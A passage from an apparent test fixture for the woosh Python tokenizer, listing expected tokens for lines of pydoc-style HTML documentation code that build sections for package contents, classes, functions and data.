woosh.Token(woosh.NAME, 'key', 799, 34, 799, 37),
woosh.Token(woosh.OP, ',', 799, 37, 799, 38),
woosh.Token(woosh.NAME, 'value', 799, 39, 799, 44),
woosh.Token(woosh.OP, ')', 799, 44, 799, 45),
woosh.Token(woosh.OP, ')', 799, 45, 799, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 799, 46, 800, 0),
woosh.Token(woosh.NAME, 'fdict', 800, 20, 800, 25),
woosh.Token(woosh.OP, '[', 800, 25, 800, 26),
woosh.Token(woosh.NAME, 'key', 800, 26, 800, 29),
woosh.Token(woosh.OP, ']', 800, 29, 800, 30),
woosh.Token(woosh.OP, '=', 800, 31, 800, 32),
woosh.Token(woosh.STRING, "'#-'", 800, 33, 800, 37),
woosh.Token(woosh.OP, '+', 800, 38, 800, 39),
woosh.Token(woosh.NAME, 'key', 800, 40, 800, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 800, 43, 801, 0),
woosh.Token(woosh.NAME, 'if', 801, 20, 801, 22),
woosh.Token(woosh.NAME, 'inspect', 801, 23, 801, 30),
woosh.Token(woosh.OP, '.', 801, 30, 801, 31),
woosh.Token(woosh.NAME, 'isfunction', 801, 31, 801, 41),
woosh.Token(woosh.OP, '(', 801, 41, 801, 42),
woosh.Token(woosh.NAME, 'value', 801, 42, 801, 47),
woosh.Token(woosh.OP, ')', 801, 47, 801, 48),
woosh.Token(woosh.OP, ':', 801, 48, 801, 49),
woosh.Token(woosh.NAME, 'fdict', 801, 50, 801, 55),
woosh.Token(woosh.OP, '[', 801, 55, 801, 56),
woosh.Token(woosh.NAME, 'value', 801, 56, 801, 61),
woosh.Token(woosh.OP, ']', 801, 61, 801, 62),
woosh.Token(woosh.OP, '=', 801, 63, 801, 64),
woosh.Token(woosh.NAME, 'fdict', 801, 65, 801, 70),
woosh.Token(woosh.OP, '[', 801, 70, 801, 71),
woosh.Token(woosh.NAME, 'key', 801, 71, 801, 74),
woosh.Token(woosh.OP, ']', 801, 74, 801, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 801, 75, 802, 0),
woosh.Token(woosh.DEDENT, ' ', 802, 0, 802, 8),
woosh.Token(woosh.DEDENT, '', 802, 8, 802, 8),
woosh.Token(woosh.DEDENT, '', 802, 8, 802, 8),
woosh.Token(woosh.NAME, 'data', 802, 8, 802, 12),
woosh.Token(woosh.OP, '=', 802, 13, 802, 14),
woosh.Token(woosh.OP, '[', 802, 15, 802, 16),
woosh.Token(woosh.OP, ']', 802, 16, 802, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 802, 17, 803, 0),
woosh.Token(woosh.NAME, 'for', 803, 8, 803, 11),
woosh.Token(woosh.NAME, 'key', 803, 12, 803, 15),
woosh.Token(woosh.OP, ',', 803, 15, 803, 16),
woosh.Token(woosh.NAME, 'value', 803, 17, 803, 22),
woosh.Token(woosh.NAME, 'in', 803, 23, 803, 25),
woosh.Token(woosh.NAME, 'inspect', 803, 26, 803, 33),
woosh.Token(woosh.OP, '.', 803, 33, 803, 34),
woosh.Token(woosh.NAME, 'getmembers', 803, 34, 803, 44),
woosh.Token(woosh.OP, '(', 803, 44, 803, 45),
woosh.Token(woosh.NAME, 'object', 803, 45, 803, 51),
woosh.Token(woosh.OP, ',', 803, 51, 803, 52),
woosh.Token(woosh.NAME, 'isdata', 803, 53, 803, 59),
woosh.Token(woosh.OP, ')', 803, 59, 803, 60),
woosh.Token(woosh.OP, ':', 803, 60, 803, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 803, 61, 804, 0),
woosh.Token(woosh.INDENT, ' ', 804, 0, 804, 12),
woosh.Token(woosh.NAME, 'if', 804, 12, 804, 14),
woosh.Token(woosh.NAME, 'visiblename', 804, 15, 804, 26),
woosh.Token(woosh.OP, '(', 804, 26, 804, 27),
woosh.Token(woosh.NAME, 'key', 804, 27, 804, 30),
woosh.Token(woosh.OP, ',', 804, 30, 804, 31),
woosh.Token(woosh.NAME, 'all', 804, 32, 804, 35),
woosh.Token(woosh.OP, ',', 804, 35, 804, 36),
woosh.Token(woosh.NAME, 'object', 804, 37, 804, 43),
woosh.Token(woosh.OP, ')', 804, 43, 804, 44),
woosh.Token(woosh.OP, ':', 804, 44, 804, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 804, 45, 805, 0),
woosh.Token(woosh.INDENT, ' ', 805, 0, 805, 16),
woosh.Token(woosh.NAME, 'data', 805, 16, 805, 20),
woosh.Token(woosh.OP, '.', 805, 20, 805, 21),
woosh.Token(woosh.NAME, 'append', 805, 21, 805, 27),
woosh.Token(woosh.OP, '(', 805, 27, 805, 28),
woosh.Token(woosh.OP, '(', 805, 28, 805, 29),
woosh.Token(woosh.NAME, 'key', 805, 29, 805, 32),
woosh.Token(woosh.OP, ',', 805, 32, 805, 33),
woosh.Token(woosh.NAME, 'value', 805, 34, 805, 39),
woosh.Token(woosh.OP, ')', 805, 39, 805, 40),
woosh.Token(woosh.OP, ')', 805, 40, 805, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 805, 41, 806, 0),
woosh.Token(woosh.DEDENT, ' ', 807, 0, 807, 8),
woosh.Token(woosh.DEDENT, '', 807, 8, 807, 8),
woosh.Token(woosh.NAME, 'doc', 807, 8, 807, 11),
woosh.Token(woosh.OP, '=', 807, 12, 807, 13),
woosh.Token(woosh.NAME, 'self', 807, 14, 807, 18),
woosh.Token(woosh.OP, '.', 807, 18, 807, 19),
woosh.Token(woosh.NAME, 'markup', 807, 19, 807, 25),
woosh.Token(woosh.OP, '(', 807, 25, 807, 26),
woosh.Token(woosh.NAME, 'getdoc', 807, 26, 807, 32),
woosh.Token(woosh.OP, '(', 807, 32, 807, 33),
woosh.Token(woosh.NAME, 'object', 807, 33, 807, 39),
woosh.Token(woosh.OP, ')', 807, 39, 807, 40),
woosh.Token(woosh.OP, ',', 807, 40, 807, 41),
woosh.Token(woosh.NAME, 'self', 807, 42, 807, 46),
woosh.Token(woosh.OP, '.', 807, 46, 807, 47),
woosh.Token(woosh.NAME, 'preformat', 807, 47, 807, 56),
woosh.Token(woosh.OP, ',', 807, 56, 807, 57),
woosh.Token(woosh.NAME, 'fdict', 807, 58, 807, 63),
woosh.Token(woosh.OP, ',', 807, 63, 807, 64),
woosh.Token(woosh.NAME, 'cdict', 807, 65, 807, 70),
woosh.Token(woosh.OP, ')', 807, 70, 807, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 807, 71, 808, 0),
woosh.Token(woosh.NAME, 'doc', 808, 8, 808, 11),
woosh.Token(woosh.OP, '=', 808, 12, 808, 13),
woosh.Token(woosh.NAME, 'doc', 808, 14, 808, 17),
woosh.Token(woosh.NAME, 'and', 808, 18, 808, 21),
woosh.Token(woosh.STRING, "'<tt>%s</tt>'", 808, 22, 808, 35),
woosh.Token(woosh.OP, '%', 808, 36, 808, 37),
woosh.Token(woosh.NAME, 'doc', 808, 38, 808, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 808, 41, 809, 0),
woosh.Token(woosh.NAME, 'result', 809, 8, 809, 14),
woosh.Token(woosh.OP, '=', 809, 15, 809, 16),
woosh.Token(woosh.NAME, 'result', 809, 17, 809, 23),
woosh.Token(woosh.OP, '+', 809, 24, 809, 25),
woosh.Token(woosh.STRING, "'<p>%s</p>\\n'", 809, 26, 809, 39),
woosh.Token(woosh.OP, '%', 809, 40, 809, 41),
woosh.Token(woosh.NAME, 'doc', 809, 42, 809, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 809, 45, 810, 0),
woosh.Token(woosh.NAME, 'if', 811, 8, 811, 10),
woosh.Token(woosh.NAME, 'hasattr', 811, 11, 811, 18),
woosh.Token(woosh.OP, '(', 811, 18, 811, 19),
woosh.Token(woosh.NAME, 'object', 811, 19, 811, 25),
woosh.Token(woosh.OP, ',', 811, 25, 811, 26),
woosh.Token(woosh.STRING, "'__path__'", 811, 27, 811, 37),
woosh.Token(woosh.OP, ')', 811, 37, 811, 38),
woosh.Token(woosh.OP, ':', 811, 38, 811, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 811, 39, 812, 0),
woosh.Token(woosh.INDENT, ' ', 812, 0, 812, 12),
woosh.Token(woosh.NAME, 'modpkgs', 812, 12, 812, 19),
woosh.Token(woosh.OP, '=', 812, 20, 812, 21),
woosh.Token(woosh.OP, '[', 812, 22, 812, 23),
woosh.Token(woosh.OP, ']', 812, 23, 812, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 812, 24, 813, 0),
woosh.Token(woosh.NAME, 'for', 813, 12, 813, 15),
woosh.Token(woosh.NAME, 'importer', 813, 16, 813, 24),
woosh.Token(woosh.OP, ',', 813, 24, 813, 25),
woosh.Token(woosh.NAME, 'modname', 813, 26, 813, 33),
woosh.Token(woosh.OP, ',', 813, 33, 813, 34),
woosh.Token(woosh.NAME, 'ispkg', 813, 35, 813, 40),
woosh.Token(woosh.NAME, 'in', 813, 41, 813, 43),
woosh.Token(woosh.NAME, 'pkgutil', 813, 44, 813, 51),
woosh.Token(woosh.OP, '.', 813, 51, 813, 52),
woosh.Token(woosh.NAME, 'iter_modules', 813, 52, 813, 64),
woosh.Token(woosh.OP, '(', 813, 64, 813, 65),
woosh.Token(woosh.NAME, 'object', 813, 65, 813, 71),
woosh.Token(woosh.OP, '.', 813, 71, 813, 72),
woosh.Token(woosh.NAME, '__path__', 813, 72, 813, 80),
woosh.Token(woosh.OP, ')', 813, 80, 813, 81),
woosh.Token(woosh.OP, ':', 813, 81, 813, 82),
woosh.Token(woosh.NEWLINE, '\r\n', 813, 82, 814, 0),
woosh.Token(woosh.INDENT, ' ', 814, 0, 814, 16),
woosh.Token(woosh.NAME, 'modpkgs', 814, 16, 814, 23),
woosh.Token(woosh.OP, '.', 814, 23, 814, 24),
woosh.Token(woosh.NAME, 'append', 814, 24, 814, 30),
woosh.Token(woosh.OP, '(', 814, 30, 814, 31),
woosh.Token(woosh.OP, '(', 814, 31, 814, 32),
woosh.Token(woosh.NAME, 'modname', 814, 32, 814, 39),
woosh.Token(woosh.OP, ',', 814, 39, 814, 40),
woosh.Token(woosh.NAME, 'name', 814, 41, 814, 45),
woosh.Token(woosh.OP, ',', 814, 45, 814, 46),
woosh.Token(woosh.NAME, 'ispkg', 814, 47, 814, 52),
woosh.Token(woosh.OP, ',', 814, 52, 814, 53),
woosh.Token(woosh.NUMBER, '0', 814, 54, 814, 55),
woosh.Token(woosh.OP, ')', 814, 55, 814, 56),
woosh.Token(woosh.OP, ')', 814, 56, 814, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 814, 57, 815, 0),
woosh.Token(woosh.DEDENT, ' ', 815, 0, 815, 12),
woosh.Token(woosh.NAME, 'modpkgs', 815, 12, 815, 19),
woosh.Token(woosh.OP, '.', 815, 19, 815, 20),
woosh.Token(woosh.NAME, 'sort', 815, 20, 815, 24),
woosh.Token(woosh.OP, '(', 815, 24, 815, 25),
woosh.Token(woosh.OP, ')', 815, 25, 815, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 815, 26, 816, 0),
woosh.Token(woosh.NAME, 'contents', 816, 12, 816, 20),
woosh.Token(woosh.OP, '=', 816, 21, 816, 22),
woosh.Token(woosh.NAME, 'self', 816, 23, 816, 27),
woosh.Token(woosh.OP, '.', 816, 27, 816, 28),
woosh.Token(woosh.NAME, 'multicolumn', 816, 28, 816, 39),
woosh.Token(woosh.OP, '(', 816, 39, 816, 40),
woosh.Token(woosh.NAME, 'modpkgs', 816, 40, 816, 47),
woosh.Token(woosh.OP, ',', 816, 47, 816, 48),
woosh.Token(woosh.NAME, 'self', 816, 49, 816, 53),
woosh.Token(woosh.OP, '.', 816, 53, 816, 54),
woosh.Token(woosh.NAME, 'modpkglink', 816, 54, 816, 64),
woosh.Token(woosh.OP, ')', 816, 64, 816, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 816, 65, 817, 0),
woosh.Token(woosh.NAME, 'result', 817, 12, 817, 18),
woosh.Token(woosh.OP, '=', 817, 19, 817, 20),
woosh.Token(woosh.NAME, 'result', 817, 21, 817, 27),
woosh.Token(woosh.OP, '+', 817, 28, 817, 29),
woosh.Token(woosh.NAME, 'self', 817, 30, 817, 34),
woosh.Token(woosh.OP, '.', 817, 34, 817, 35),
woosh.Token(woosh.NAME, 'bigsection', 817, 35, 817, 45),
woosh.Token(woosh.OP, '(', 817, 45, 817, 46),
woosh.Token(woosh.STRING, "'Package Contents'", 818, 16, 818, 34),
woosh.Token(woosh.OP, ',', 818, 34, 818, 35),
woosh.Token(woosh.STRING, "'#ffffff'", 818, 36, 818, 45),
woosh.Token(woosh.OP, ',', 818, 45, 818, 46),
woosh.Token(woosh.STRING, "'#aa55cc'", 818, 47, 818, 56),
woosh.Token(woosh.OP, ',', 818, 56, 818, 57),
woosh.Token(woosh.NAME, 'contents', 818, 58, 818, 66),
woosh.Token(woosh.OP, ')', 818, 66, 818, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 818, 67, 819, 0),
woosh.Token(woosh.DEDENT, ' ', 819, 0, 819, 8),
woosh.Token(woosh.NAME, 'elif', 819, 8, 819, 12),
woosh.Token(woosh.NAME, 'modules', 819, 13, 819, 20),
woosh.Token(woosh.OP, ':', 819, 20, 819, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 819, 21, 820, 0),
woosh.Token(woosh.INDENT, ' ', 820, 0, 820, 12),
woosh.Token(woosh.NAME, 'contents', 820, 12, 820, 20),
woosh.Token(woosh.OP, '=', 820, 21, 820, 22),
woosh.Token(woosh.NAME, 'self', 820, 23, 820, 27),
woosh.Token(woosh.OP, '.', 820, 27, 820, 28),
woosh.Token(woosh.NAME, 'multicolumn', 820, 28, 820, 39),
woosh.Token(woosh.OP, '(', 820, 39, 820, 40),
woosh.Token(woosh.NAME, 'modules', 821, 16, 821, 23),
woosh.Token(woosh.OP, ',', 821, 23, 821, 24),
woosh.Token(woosh.NAME, 'lambda', 821, 25, 821, 31),
woosh.Token(woosh.NAME, 't', 821, 32, 821, 33),
woosh.Token(woosh.OP, ':', 821, 33, 821, 34),
woosh.Token(woosh.NAME, 'self', 821, 35, 821, 39),
woosh.Token(woosh.OP, '.', 821, 39, 821, 40),
woosh.Token(woosh.NAME, 'modulelink', 821, 40, 821, 50),
woosh.Token(woosh.OP, '(', 821, 50, 821, 51),
woosh.Token(woosh.NAME, 't', 821, 51, 821, 52),
woosh.Token(woosh.OP, '[', 821, 52, 821, 53),
woosh.Token(woosh.NUMBER, '1', 821, 53, 821, 54),
woosh.Token(woosh.OP, ']', 821, 54, 821, 55),
woosh.Token(woosh.OP, ')', 821, 55, 821, 56),
woosh.Token(woosh.OP, ')', 821, 56, 821, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 821, 57, 822, 0),
woosh.Token(woosh.NAME, 'result', 822, 12, 822, 18),
woosh.Token(woosh.OP, '=', 822, 19, 822, 20),
woosh.Token(woosh.NAME, 'result', 822, 21, 822, 27),
woosh.Token(woosh.OP, '+', 822, 28, 822, 29),
woosh.Token(woosh.NAME, 'self', 822, 30, 822, 34),
woosh.Token(woosh.OP, '.', 822, 34, 822, 35),
woosh.Token(woosh.NAME, 'bigsection', 822, 35, 822, 45),
woosh.Token(woosh.OP, '(', 822, 45, 822, 46),
woosh.Token(woosh.STRING, "'Modules'", 823, 16, 823, 25),
woosh.Token(woosh.OP, ',', 823, 25, 823, 26),
woosh.Token(woosh.STRING, "'#ffffff'", 823, 27, 823, 36),
woosh.Token(woosh.OP, ',', 823, 36, 823, 37),
woosh.Token(woosh.STRING, "'#aa55cc'", 823, 38, 823, 47),
woosh.Token(woosh.OP, ',', 823, 47, 823, 48),
woosh.Token(woosh.NAME, 'contents', 823, 49, 823, 57),
woosh.Token(woosh.OP, ')', 823, 57, 823, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 823, 58, 824, 0),
woosh.Token(woosh.DEDENT, ' ', 825, 0, 825, 8),
woosh.Token(woosh.NAME, 'if', 825, 8, 825, 10),
woosh.Token(woosh.NAME, 'classes', 825, 11, 825, 18),
woosh.Token(woosh.OP, ':', 825, 18, 825, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 825, 19, 826, 0),
woosh.Token(woosh.INDENT, ' ', 826, 0, 826, 12),
woosh.Token(woosh.NAME, 'classlist', 826, 12, 826, 21),
woosh.Token(woosh.OP, '=', 826, 22, 826, 23),
woosh.Token(woosh.OP, '[', 826, 24, 826, 25),
woosh.Token(woosh.NAME, 'value', 826, 25, 826, 30),
woosh.Token(woosh.NAME, 'for', 826, 31, 826, 34),
woosh.Token(woosh.OP, '(', 826, 35, 826, 36),
woosh.Token(woosh.NAME, 'key', 826, 36, 826, 39),
woosh.Token(woosh.OP, ',', 826, 39, 826, 40),
woosh.Token(woosh.NAME, 'value', 826, 41, 826, 46),
woosh.Token(woosh.OP, ')', 826, 46, 826, 47),
woosh.Token(woosh.NAME, 'in', 826, 48, 826, 50),
woosh.Token(woosh.NAME, 'classes', 826, 51, 826, 58),
woosh.Token(woosh.OP, ']', 826, 58, 826, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 826, 59, 827, 0),
woosh.Token(woosh.NAME, 'contents', 827, 12, 827, 20),
woosh.Token(woosh.OP, '=', 827, 21, 827, 22),
woosh.Token(woosh.OP, '[', 827, 23, 827, 24),
woosh.Token(woosh.NAME, 'self', 828, 16, 828, 20),
woosh.Token(woosh.OP, '.', 828, 20, 828, 21),
woosh.Token(woosh.NAME, 'formattree', 828, 21, 828, 31),
woosh.Token(woosh.OP, '(', 828, 31, 828, 32),
woosh.Token(woosh.NAME, 'inspect', 828, 32, 828, 39),
woosh.Token(woosh.OP, '.', 828, 39, 828, 40),
woosh.Token(woosh.NAME, 'getclasstree', 828, 40, 828, 52),
woosh.Token(woosh.OP, '(', 828, 52, 828, 53),
woosh.Token(woosh.NAME, 'classlist', 828, 53, 828, 62),
woosh.Token(woosh.OP, ',', 828, 62, 828, 63),
woosh.Token(woosh.NUMBER, '1', 828, 64, 828, 65),
woosh.Token(woosh.OP, ')', 828, 65, 828, 66),
woosh.Token(woosh.OP, ',', 828, 66, 828, 67),
woosh.Token(woosh.NAME, 'name', 828, 68, 828, 72),
woosh.Token(woosh.OP, ')', 828, 72, 828, 73),
woosh.Token(woosh.OP, ']', 828, 73, 828, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 828, 74, 829, 0),
woosh.Token(woosh.NAME, 'for', 829, 12, 829, 15),
woosh.Token(woosh.NAME, 'key', 829, 16, 829, 19),
woosh.Token(woosh.OP, ',', 829, 19, 829, 20),
woosh.Token(woosh.NAME, 'value', 829, 21, 829, 26),
woosh.Token(woosh.NAME, 'in', 829, 27, 829, 29),
woosh.Token(woosh.NAME, 'classes', 829, 30, 829, 37),
woosh.Token(woosh.OP, ':', 829, 37, 829, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 829, 38, 830, 0),
woosh.Token(woosh.INDENT, ' ', 830, 0, 830, 16),
woosh.Token(woosh.NAME, 'contents', 830, 16, 830, 24),
woosh.Token(woosh.OP, '.', 830, 24, 830, 25),
woosh.Token(woosh.NAME, 'append', 830, 25, 830, 31),
woosh.Token(woosh.OP, '(', 830, 31, 830, 32),
woosh.Token(woosh.NAME, 'self', 830, 32, 830, 36),
woosh.Token(woosh.OP, '.', 830, 36, 830, 37),
woosh.Token(woosh.NAME, 'document', 830, 37, 830, 45),
woosh.Token(woosh.OP, '(', 830, 45, 830, 46),
woosh.Token(woosh.NAME, 'value', 830, 46, 830, 51),
woosh.Token(woosh.OP, ',', 830, 51, 830, 52),
woosh.Token(woosh.NAME, 'key', 830, 53, 830, 56),
woosh.Token(woosh.OP, ',', 830, 56, 830, 57),
woosh.Token(woosh.NAME, 'name', 830, 58, 830, 62),
woosh.Token(woosh.OP, ',', 830, 62, 830, 63),
woosh.Token(woosh.NAME, 'fdict', 830, 64, 830, 69),
woosh.Token(woosh.OP, ',', 830, 69, 830, 70),
woosh.Token(woosh.NAME, 'cdict', 830, 71, 830, 76),
woosh.Token(woosh.OP, ')', 830, 76, 830, 77),
woosh.Token(woosh.OP, ')', 830, 77, 830, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 830, 78, 831, 0),
woosh.Token(woosh.DEDENT, ' ', 831, 0, 831, 12),
woosh.Token(woosh.NAME, 'result', 831, 12, 831, 18),
woosh.Token(woosh.OP, '=', 831, 19, 831, 20),
woosh.Token(woosh.NAME, 'result', 831, 21, 831, 27),
woosh.Token(woosh.OP, '+', 831, 28, 831, 29),
woosh.Token(woosh.NAME, 'self', 831, 30, 831, 34),
woosh.Token(woosh.OP, '.', 831, 34, 831, 35),
woosh.Token(woosh.NAME, 'bigsection', 831, 35, 831, 45),
woosh.Token(woosh.OP, '(', 831, 45, 831, 46),
woosh.Token(woosh.STRING, "'Classes'", 832, 16, 832, 25),
woosh.Token(woosh.OP, ',', 832, 25, 832, 26),
woosh.Token(woosh.STRING, "'#ffffff'", 832, 27, 832, 36),
woosh.Token(woosh.OP, ',', 832, 36, 832, 37),
woosh.Token(woosh.STRING, "'#ee77aa'", 832, 38, 832, 47),
woosh.Token(woosh.OP, ',', 832, 47, 832, 48),
woosh.Token(woosh.STRING, "' '", 832, 49, 832, 52),
woosh.Token(woosh.OP, '.', 832, 52, 832, 53),
woosh.Token(woosh.NAME, 'join', 832, 53, 832, 57),
woosh.Token(woosh.OP, '(', 832, 57, 832, 58),
woosh.Token(woosh.NAME, 'contents', 832, 58, 832, 66),
woosh.Token(woosh.OP, ')', 832, 66, 832, 67),
woosh.Token(woosh.OP, ')', 832, 67, 832, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 832, 68, 833, 0),
woosh.Token(woosh.DEDENT, ' ', 833, 0, 833, 8),
woosh.Token(woosh.NAME, 'if', 833, 8, 833, 10),
woosh.Token(woosh.NAME, 'funcs', 833, 11, 833, 16),
woosh.Token(woosh.OP, ':', 833, 16, 833, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 833, 17, 834, 0),
woosh.Token(woosh.INDENT, ' ', 834, 0, 834, 12),
woosh.Token(woosh.NAME, 'contents', 834, 12, 834, 20),
woosh.Token(woosh.OP, '=', 834, 21, 834, 22),
woosh.Token(woosh.OP, '[', 834, 23, 834, 24),
woosh.Token(woosh.OP, ']', 834, 24, 834, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 834, 25, 835, 0),
woosh.Token(woosh.NAME, 'for', 835, 12, 835, 15),
woosh.Token(woosh.NAME, 'key', 835, 16, 835, 19),
woosh.Token(woosh.OP, ',', 835, 19, 835, 20),
woosh.Token(woosh.NAME, 'value', 835, 21, 835, 26),
woosh.Token(woosh.NAME, 'in', 835, 27, 835, 29),
woosh.Token(woosh.NAME, 'funcs', 835, 30, 835, 35),
woosh.Token(woosh.OP, ':', 835, 35, 835, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 835, 36, 836, 0),
woosh.Token(woosh.INDENT, ' ', 836, 0, 836, 16),
woosh.Token(woosh.NAME, 'contents', 836, 16, 836, 24),
woosh.Token(woosh.OP, '.', 836, 24, 836, 25),
woosh.Token(woosh.NAME, 'append', 836, 25, 836, 31),
woosh.Token(woosh.OP, '(', 836, 31, 836, 32),
woosh.Token(woosh.NAME, 'self', 836, 32, 836, 36),
woosh.Token(woosh.OP, '.', 836, 36, 836, 37),
woosh.Token(woosh.NAME, 'document', 836, 37, 836, 45),
woosh.Token(woosh.OP, '(', 836, 45, 836, 46),
woosh.Token(woosh.NAME, 'value', 836, 46, 836, 51),
woosh.Token(woosh.OP, ',', 836, 51, 836, 52),
woosh.Token(woosh.NAME, 'key', 836, 53, 836, 56),
woosh.Token(woosh.OP, ',', 836, 56, 836, 57),
woosh.Token(woosh.NAME, 'name', 836, 58, 836, 62),
woosh.Token(woosh.OP, ',', 836, 62, 836, 63),
woosh.Token(woosh.NAME, 'fdict', 836, 64, 836, 69),
woosh.Token(woosh.OP, ',', 836, 69, 836, 70),
woosh.Token(woosh.NAME, 'cdict', 836, 71, 836, 76),
woosh.Token(woosh.OP, ')', 836, 76, 836, 77),
woosh.Token(woosh.OP, ')', 836, 77, 836, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 836, 78, 837, 0),
woosh.Token(woosh.DEDENT, ' ', 837, 0, 837, 12),
woosh.Token(woosh.NAME, 'result', 837, 12, 837, 18),
woosh.Token(woosh.OP, '=', 837, 19, 837, 20),
woosh.Token(woosh.NAME, 'result', 837, 21, 837, 27),
woosh.Token(woosh.OP, '+', 837, 28, 837, 29),
woosh.Token(woosh.NAME, 'self', 837, 30, 837, 34),
woosh.Token(woosh.OP, '.', 837, 34, 837, 35),
woosh.Token(woosh.NAME, 'bigsection', 837, 35, 837, 45),
woosh.Token(woosh.OP, '(', 837, 45, 837, 46),
woosh.Token(woosh.STRING, "'Functions'", 838, 16, 838, 27),
woosh.Token(woosh.OP, ',', 838, 27, 838, 28),
woosh.Token(woosh.STRING, "'#ffffff'", 838, 29, 838, 38),
woosh.Token(woosh.OP, ',', 838, 38, 838, 39),
woosh.Token(woosh.STRING, "'#eeaa77'", 838, 40, 838, 49),
woosh.Token(woosh.OP, ',', 838, 49, 838, 50),
woosh.Token(woosh.STRING, "' '", 838, 51, 838, 54),
woosh.Token(woosh.OP, '.', 838, 54, 838, 55),
woosh.Token(woosh.NAME, 'join', 838, 55, 838, 59),
woosh.Token(woosh.OP, '(', 838, 59, 838, 60),
woosh.Token(woosh.NAME, 'contents', 838, 60, 838, 68),
woosh.Token(woosh.OP, ')', 838, 68, 838, 69),
woosh.Token(woosh.OP, ')', 838, 69, 838, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 838, 70, 839, 0),
woosh.Token(woosh.DEDENT, ' ', 839, 0, 839, 8),
woosh.Token(woosh.NAME, 'if', 839, 8, 839, 10),
woosh.Token(woosh.NAME, 'data', 839, 11, 839, 15),
woosh.Token(woosh.OP, ':', 839, 15, 839, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 839, 16, 840, 0),
woosh.Token(woosh.INDENT, ' ', 840, 0, 840, 12),
woosh.Token(woosh.NAME, 'contents', 840, 12, 840, 20),
woosh.Token(woosh.OP, '=', 840, 21, 840, 22),
woosh.Token(woosh.OP, '[', 840, 23, 840, 24),
woosh.Token(woosh.OP, ']', 840, 24, 840, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 840, 25, 841, 0),
woosh.Token(woosh.NAME, 'for', 841, 12, 841, 15),
woosh.Token(woosh.NAME, 'key', 841, 16, 841, 19),
woosh.Token(woosh.OP, ',', 841, 19, 841, 20),
woosh.Token(woosh.NAME, 'value', 841, 21, 841, 26),
woosh.Token(woosh.NAME, 'in', 841, 27, 841, 29),
woosh.Token(woosh.NAME, 'data', 841, 30, 841, 34),
woosh.Token(woosh.OP, ':', 841, 34, 841, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 841, 35, 842, 0),
woosh.Token(woosh.INDENT, ' ', 842, 0, 842, 16),
woosh.Token(woosh.NAME, 'contents', 842, 16, 842, 24),
woosh.Token(woosh.OP, '.', 842, 24, 842, 25),
woosh.Token(woosh.NAME, 'append', 842, 25, 842, 31),
woosh.Token(woosh.OP, '(', 842, 31, 842, 32),
woosh.Token(woosh.NAME, 'self', 842, 32, 842, 36),
woosh.Token(woosh.OP, '.', 842, 36, 842, 37),
woosh.Token(woosh.NAME, 'document', 842, 37, 842, 45),
woosh.Token(woosh.OP, '(', 842, 45, 842, 46),
woosh.Token(woosh.NAME, 'value', 842, 46, 842, 51),
woosh.Token(woosh.OP, ',', 842, 51, 842, 52),
woosh.Token(woosh.NAME, 'key', 842, 53, 842, 56),
woosh.Token(woosh.OP, ')', 842, 56, 842, 57),
woosh.Token(woosh.OP, ')', 842, 57, 842, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 842, 58, 843, 0),
woosh.Token(woosh.DEDENT, ' ', 843, 0, 843, 12),
woosh.Token(woosh.NAME, 'result', 843, 12, 843, 18),
woosh.Token(woosh.OP, '=', 843, 19, 843, 20),
woosh.Token(woosh.NAME, 'result', 843, 21, 843, 27),
woosh.Token(woosh.OP, '+', 843, 28, 843, 29),
woosh.Token(woosh.NAME, 'self', 843, 30, 843, 34),
woosh.Token(woosh.OP, '.', 843, 34, 843, 35),
woosh.Token(woosh.NAME, 'bigsection', 843, 35, 843, 45),
woosh.Token(woosh.OP, '(', 843, 45, 843, 46),
woosh.Token(woosh.STRING, "'Data'", 844, 16, 844, 22),
woosh.Token(woosh.OP, ',', 844, 22, 844, 23),
woosh.Token(woosh.STRING, "'#ffffff'", 844, 24, 844, 33),
woosh.Token(woosh.OP, ',', 844, 33, 844, 34),
woosh.Token(woosh.STRING, "'#55aa55'", 844, 35, 844, 44),
woosh.Token(woosh.OP, ',', 844, 44, 844, 45),
woosh.Token(woosh.STRING, "'<br>\\n'", 844, 46, 844, 54),
woosh.Token(woosh.OP, '.', 844, 54, 844, 55),
woosh.Token(woosh.NAME, 'join', 844, 55, 844, 59),
woosh.Token(woosh.OP, '(', 844, 59, 844, 60),
woosh.Token(woosh.NAME, 'contents', 844, 60, 844, 68),
woosh.Token(woosh.OP, ')', 844, 68, 844, 69),
woosh.Token(woosh.OP, ')', 844, 69, 844, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 844, 70, 845, 0),
woosh.Token(woosh.DEDENT, ' ', 845, 0, 845, 8),
woosh.Token(woosh.NAME, 'if', 845, 8, 845, 10),
woosh.Token(woosh.NAME, 'hasattr', 845, 11, 845, 18),
woosh.Token(woosh.OP, '(', 845, 18, 845, 19),
woosh.Token(woosh.NAME, 'object', 845, 19, 845, 25),
woosh.Token(woosh.OP, ',', 845, 25, 845, 26),
